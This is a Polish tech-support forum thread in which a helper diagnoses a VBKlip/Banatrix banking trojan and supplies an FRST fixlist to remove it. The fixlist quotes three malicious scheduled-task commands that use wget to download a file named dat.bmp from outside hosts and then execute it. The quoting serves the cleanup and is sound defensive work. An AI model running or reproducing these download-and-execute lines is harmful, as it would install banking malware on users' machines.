Trojan data.bmp - problem

[liberator1907]

Witam,

od niedawna pojawia mi się komunikat o zagrożeniu, mianowicie o trojanie data.bmp. Antywirus nie jest w stanie tego usunąć. Adwcleaner to samo. Trochę mnie irytuje ta zaistniała sytuacja. Poniżej przesyłam logi. Z góry bardzo dziękuje.

Pozdrawiam,

Liberator1907

 

Shortcut.txt

Addition.txt

FRST.txt

[picasso]

W systemie jest wariant infekcji VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań. AdwCleaner nie nadaje się do usuwania takich infekcji. Dodatkowy problem to skutki pobytu innych infekcji typu adware - cała przeglądarka Google Chrome została przekonwertowana z wersji stabilnej do developerskiej i wymagana kompleksowa reinstalacja od zera.

 

Działania do przeprowadzenia:

 

1. Odinstaluj zdefektowaną przeglądarkę Google Chrome, adware Image Downloader Plus oraz zbędny AVG Web TuneUp. Przed deinstalacją Chrome możesz wyeksportować zakładki, przy deinstalacji zaznacz Usuń także dane przeglądarki.

 

2. Otwórz Notatnik i wklej w nim:

 

CloseProcesses:
CreateRestorePoint:
Task: {024D2B1F-E3FD-4480-A24E-A137F47187DF} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=rNeUiHGSrv;avg_isct_x64_all_2014_4745a8017.exe;1419765027 & start cmd /R dat.bmp 
Task: {18847BFA-6E53-449A-A62C-58BFC76EC40D} - System32\Tasks\SYSTEMDOWN => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://sdshdb.nl/index.php?data=GlMhYSqEF4;up;1421863986 & start cmd /R dat.bmp 
Task: {AD6EFD0C-E8F6-4A25-9CBA-39EB81A1FEA9} - System32\Tasks\SYSTEMUP => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 350 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://iashdb.in/index.php?data=u58NcYSj5B;up;1421863975 & start cmd /R dat.bmp 
HKU\S-1-5-21-1495383292-872571241-3386128745-1000\...\MountPoints2: {513c06f0-9262-11e4-a59d-002622ebb618} - G:\SETUP.EXE /AUTORUN
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
HKU\S-1-5-21-1495383292-872571241-3386128745-1000\Software\Microsoft\Internet Explorer\Main,Start Page = https://mysearch.avg.com/?cid={ED457F59-AAD2-4CF4-9536-EB952E6D8149}&mid=ed7145c1808247cdac51d16f640f5feb-3b249e40b8f31b7c2c567e14da7d3949258460bb&lang=pl&ds=AVG&coid=avgtbavg&cmpid=&pr=fr&d=2014-12-30 11:15:17&v=4.1.0.411&pid=wtu&sg=&sap=hp
U4 Avgfwfd; system32\DRIVERS\avgfwd6a.sys [X]
S2 vToolbarUpdater18.4.0; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.4.0\ToolbarUpdater.exe [X]
C:\ProgramData\dat.bmp
C:\ProgramData\wget.exe
C:\Windows\msdownld.tmp
RemoveDirectory: C:\Users\TEMP
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj / Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone, ale Adblock Plus trzeba będzie przeinstalować.

 

4. Zrób nowy log FRST z opcji Scan, zaznacz ponownie pole Addition, by powstały dwa logi. Dołącz też plik fixlog.txt oraz logi z folderu C:\AdwCleaner (nie uruchamiaj narzędzia ponownie, chodzi o poprzednie wyniki).